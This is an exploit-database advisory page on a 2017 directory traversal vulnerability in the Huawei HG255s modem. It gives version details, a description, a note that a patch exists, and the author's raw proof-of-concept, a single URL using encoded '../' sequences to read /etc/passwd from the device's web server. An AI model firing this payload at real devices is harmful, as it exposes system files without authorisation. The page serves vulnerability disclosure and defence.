header-logo
Suggest Exploit
vendor:
HG255s
by:
Ahmet Mersin
8,8
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: HG255s
Affected Version From: V100R001C163B025SP02
Affected Version To: V100R001C163B025SP02
Patch Exists: Yes
Related CWE: N/A
CPE: huawei:hg255s
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Server Directory Traversal at Huawei HG255s

A directory traversal vulnerability was discovered in Huawei HG255s modem. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g. “../”) to the vulnerable device. This allows the attacker to access sensitive information such as the /etc/passwd file. A proof-of-concept video and HTTP request are available.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their devices to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: [Server Directory Traversal at Huawei HG255s]

# Date: [07.09.2017]

# Exploit Author: [Ahmet Mersin]

# Vendor Homepage: [www.huawei.com]

# Software Link: [Not published this modem just used by Turkey]

# Version: [V100R001C163B025SP02]

#POC:

https://www.youtube.com/watch?v=n02toTFkLOU&feature=youtu.be

http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

#You want to follow my activity ?

https://www.linkedin.com/in/ahmet-mersin-177398b0/

@gaissecurity